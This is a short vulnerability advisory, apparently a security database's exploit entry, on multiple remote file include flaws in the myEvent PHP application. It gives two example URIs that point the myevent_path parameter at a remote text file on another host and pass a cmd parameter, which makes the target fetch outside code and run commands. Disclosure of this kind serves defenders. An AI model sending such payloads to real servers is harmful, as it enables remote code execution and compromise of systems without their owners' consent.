• info
• discussion
• exploit
• solution
• references

myEvent Multiple Remote File Include Vulnerabilities

Attackers can exploit these issues via a web client.

The following example URIs demonstrate these issues:

http://www.example.com/event.php?myevent_path=http://www.example2.com/x.txt?&cmd=[cmd]
http://www.example.com/initialize.php?myevent_path=http://www.example2.com/x.txt?&cmd=[cmd]